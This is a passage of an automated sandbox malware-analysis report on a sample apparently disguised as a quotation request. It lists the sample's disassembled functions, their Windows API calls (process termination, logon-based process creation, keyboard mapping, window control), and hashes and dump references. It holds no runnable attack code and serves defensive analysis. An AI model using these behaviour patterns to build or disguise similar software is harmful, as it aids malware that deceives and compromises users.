                                                                                                                    • Instruction Fuzzy Hash: F041AD71509314AFD720DF25DC84FBA7BB8FB46724F14022AF9948B2E2C7749845EB61
                                                                                                                    Function 00F807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F8080C
                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F80847
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F80863
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F808DC
                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F808F3
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F80921
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3368777196-0
                                                                                                                    • Opcode ID: 31337c44cd7c91b224ee7fb14f62fc89c6b777f5b704a31086a52fa9acdb4051
                                                                                                                    • Instruction ID: 028192c24b9c0a8f42d67cffd11237b18896fab106929797e5a12f505b48c2cb
                                                                                                                    • Opcode Fuzzy Hash: 31337c44cd7c91b224ee7fb14f62fc89c6b777f5b704a31086a52fa9acdb4051
                                                                                                                    • Instruction Fuzzy Hash: 7D41AF71A00209EFDF05AF54DC85AAA77B8FF04310F1040B9ED00AA297DB34DE58EBA0
                                                                                                                    Function 00FA81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F6F3AB,00000000,?,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00FA824C
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00FA8272
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FA82D1
                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 00FA82E5
                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00FA830B
                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FA832F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642888154-0
                                                                                                                    • Opcode ID: 3f87041d0598065e1a79c840ee179488b21213a49f9c38148a0e25fc8edf21cd
                                                                                                                    • Instruction ID: 744738290aa35f13e6cccd094690882335fb81971c78ebe49d61c0faacf05067
                                                                                                                    • Opcode Fuzzy Hash: 3f87041d0598065e1a79c840ee179488b21213a49f9c38148a0e25fc8edf21cd
                                                                                                                    • Instruction Fuzzy Hash: 4241C3B4A01648EFDF11CF15D899BE87BF0BB4B764F180168E6484F262CB71A842EB40
                                                                                                                    Function 00F74C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00F74C95
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F74CB2
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F74CEA
                                                                                                                    • _wcslen.LIBCMT ref: 00F74D08
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F74D10
                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00F74D1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 72514467-0
                                                                                                                    • Opcode ID: ef99c3a81363cabffdca455dd97d06768d3ac8a283110263ed40540994181a4f
                                                                                                                    • Instruction ID: 75256d49171b57bc942f7609308e20f0b59d6e8ce39c65898f1749753bf723e0
                                                                                                                    • Opcode Fuzzy Hash: ef99c3a81363cabffdca455dd97d06768d3ac8a283110263ed40540994181a4f
                                                                                                                    • Instruction Fuzzy Hash: 3321DA72604114BBEB269B39EC45E7B7BACDF46760F10807AF80DCA151EB65EC00A6A1
                                                                                                                    Function 00F8581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
                                                                                                                    • _wcslen.LIBCMT ref: 00F8587B
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00F85995
                                                                                                                    • CoCreateInstance.OLE32(00FAFCF8,00000000,00000001,00FAFB68,?), ref: 00F859AE
                                                                                                                    • CoUninitialize.OLE32 ref: 00F859CC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                    • Opcode ID: 87e77d89a167187f1b3daba4564701e041067e6a8cf492b64a49f0f664f903d2
                                                                                                                    • Instruction ID: 87d38c6042043026f9a3693fa56da98230ae2a24634fd892b4c12cac01c4e837
                                                                                                                    • Opcode Fuzzy Hash: 87e77d89a167187f1b3daba4564701e041067e6a8cf492b64a49f0f664f903d2
                                                                                                                    • Instruction Fuzzy Hash: BDD15571A087019FC714EF14C880AAABBF2FF89B24F144859F8899B361D735EC45DB92
                                                                                                                    Function 00F7175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F70FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F70FCA
                                                                                                                      • Part of subcall function 00F70FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F70FD6
                                                                                                                      • Part of subcall function 00F70FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F70FE5
                                                                                                                      • Part of subcall function 00F70FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F70FEC
                                                                                                                      • Part of subcall function 00F70FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F71002
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00F71335), ref: 00F717AE
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F717BA
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F717C1
                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F717DA
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F71335), ref: 00F717EE
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F717F5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3008561057-0
                                                                                                                    • Opcode ID: bb6bf71d435d93a6c50c7011e2665952af69a55db8e56f40b58d01c8aa5d50a6
                                                                                                                    • Instruction ID: 17e6242355e02ca238a357edf6eefa99166ca81001cd5b0b120e2757051bd19e
                                                                                                                    • Opcode Fuzzy Hash: bb6bf71d435d93a6c50c7011e2665952af69a55db8e56f40b58d01c8aa5d50a6
                                                                                                                    • Instruction Fuzzy Hash: EE11AF71A00209EFDB149FA8CC49BAF7BB9FB42365F10C019F44597111C7359949EBA1
                                                                                                                    Function 00F714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F714FF
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F71506
                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F71515
                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00F71520
                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F7154F
                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F71563
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    • Opcode ID: 78dbb6fa9227e0a7719d66fe9df7467da3a7a3c9e5d1b40b4bb786dedc39640c
                                                                                                                    • Instruction ID: 11c68374826a4d71b9919fdd03daec37b14dc3f2337e750a8e6d2b48f0e0b746
                                                                                                                    • Opcode Fuzzy Hash: 78dbb6fa9227e0a7719d66fe9df7467da3a7a3c9e5d1b40b4bb786dedc39640c
                                                                                                                    • Instruction Fuzzy Hash: 431129B250020DABDF11CF98DD49BDE7BA9FF49754F048015FA09A2160C3758E68EBA1
                                                                                                                    Function 00F33382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00F33379,00F32FE5), ref: 00F33390
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F3339E
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F333B7
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00F33379,00F32FE5), ref: 00F33409
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 194954f7d6f9b73a2a7b219c25ccf0b650dfd372236241dd5dc8e2ca9f0c522b
                                                                                                                    • Instruction ID: 75ce550e7161bb778d3ef67040b60fdbaeb5f3a4cbcddb10d37b19fac3007d72
                                                                                                                    • Opcode Fuzzy Hash: 194954f7d6f9b73a2a7b219c25ccf0b650dfd372236241dd5dc8e2ca9f0c522b
                                                                                                                    • Instruction Fuzzy Hash: 2F01FC33A0E316BEAA15A775BC8AB577F55DB05379F20822AF410C52F0EF154D01B584
                                                                                                                    Function 00F42D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00F45686,00F53CD6,?,00000000,?,00F45B6A,?,?,?,?,?,00F3E6D1,?,00FD8A48), ref: 00F42D78
                                                                                                                    • _free.LIBCMT ref: 00F42DAB
                                                                                                                    • _free.LIBCMT ref: 00F42DD3
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,00F3E6D1,?,00FD8A48,00000010,00F14F4A,?,?,00000000,00F53CD6), ref: 00F42DE0
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,00F3E6D1,?,00FD8A48,00000010,00F14F4A,?,?,00000000,00F53CD6), ref: 00F42DEC
                                                                                                                    • _abort.LIBCMT ref: 00F42DF2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 7a6711af2872b26de9ac855fc7c98ffd377125ea5675c428ef88d89e8c6d2b1a
                                                                                                                    • Instruction ID: 00721abf39e7937190bdb50ca5760a2558a3340b421b09b37f5e5ab9594c3c72
                                                                                                                    • Opcode Fuzzy Hash: 7a6711af2872b26de9ac855fc7c98ffd377125ea5675c428ef88d89e8c6d2b1a
                                                                                                                    • Instruction Fuzzy Hash: DFF0CD32D05A1127C69267397C06F1E3E76AFC2771F640435FC24921D1DE7889017161
                                                                                                                    Function 00FA8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F29693
                                                                                                                      • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296A2
                                                                                                                      • Part of subcall function 00F29639: BeginPath.GDI32(?), ref: 00F296B9
                                                                                                                      • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296E2
                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FA8A4E
                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00FA8A62
                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FA8A70
                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00FA8A80
                                                                                                                    • EndPath.GDI32(?), ref: 00FA8A90
                                                                                                                    • StrokePath.GDI32(?), ref: 00FA8AA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 43455801-0
                                                                                                                    • Opcode ID: 24e3866ef86b9043852d065f3c438acfbca939cea90027427d517fdb6fe5ac13
                                                                                                                    • Instruction ID: f78b2743d40e46e9becf7c4d30874d864764bc40fb969fb04e6b779c158b417b
                                                                                                                    • Opcode Fuzzy Hash: 24e3866ef86b9043852d065f3c438acfbca939cea90027427d517fdb6fe5ac13
                                                                                                                    • Instruction Fuzzy Hash: 581109B600014CFFDB129F90DC88EAA7F6CEB09390F00C012BA199A1A1C7719D55EBA0
                                                                                                                    Function 00F751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00F75218
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F75229
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F75230
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F75238
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F7524F
                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F75261
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: a939b436f423ea00950aec3ef500fafdc5009f4e88f81f3e981bfc1290a1ee2b
                                                                                                                    • Instruction ID: bbe6a3b66bdf07132bf109ef758622026c322fddb57bb7c2069dede6ca41b54e
                                                                                                                    • Opcode Fuzzy Hash: a939b436f423ea00950aec3ef500fafdc5009f4e88f81f3e981bfc1290a1ee2b
                                                                                                                    • Instruction Fuzzy Hash: 460162B5E00718BBEB109BA59C49E5EBFB9EF49751F048066FA09E7381D6709C00DFA1
                                                                                                                    Function 00F11BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F11BF4
                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F11BFC
                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F11C07
                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F11C12
                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F11C1A
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F11C22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: 3d5b174fe918ff348317e8ecdc868a218bf2df2fe7d9a0b2079dabf98ffe4199
                                                                                                                    • Instruction ID: 31497f4e0c4ffc492fd8372c0a950a29e754092bc7f107b1e8c7cd8689944b28
                                                                                                                    • Opcode Fuzzy Hash: 3d5b174fe918ff348317e8ecdc868a218bf2df2fe7d9a0b2079dabf98ffe4199
                                                                                                                    • Instruction Fuzzy Hash: 7C0167B0902B5ABDE3008F6A8C85B52FFE8FF19354F04411BA15C4BA42C7F5A864CBE5
                                                                                                                    Function 00F7EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F7EB30
                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F7EB46
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F7EB55
                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7EB64
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7EB6E
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7EB75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    • Opcode ID: f2f2654b7097863975bbd87992764e22e3d871f43ba95d9c5c7838df31cff53a
                                                                                                                    • Instruction ID: f56d177187f96585a86dfc456ab9cedbbcfefda7819577b6c89bf40817e4c7be
                                                                                                                    • Opcode Fuzzy Hash: f2f2654b7097863975bbd87992764e22e3d871f43ba95d9c5c7838df31cff53a
                                                                                                                    • Instruction Fuzzy Hash: 72F017B2640158BBE6219B629C0EEAB3A7CEBCBB11F004159F605D1191EBA05A01AAF5
                                                                                                                    Function 00F67439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?), ref: 00F67452
                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F67469
                                                                                                                    • GetWindowDC.USER32(?), ref: 00F67475
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00F67484
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00F67496
                                                                                                                    • GetSysColor.USER32(00000005), ref: 00F674B0
                                                                                                                    Memory Dump Source
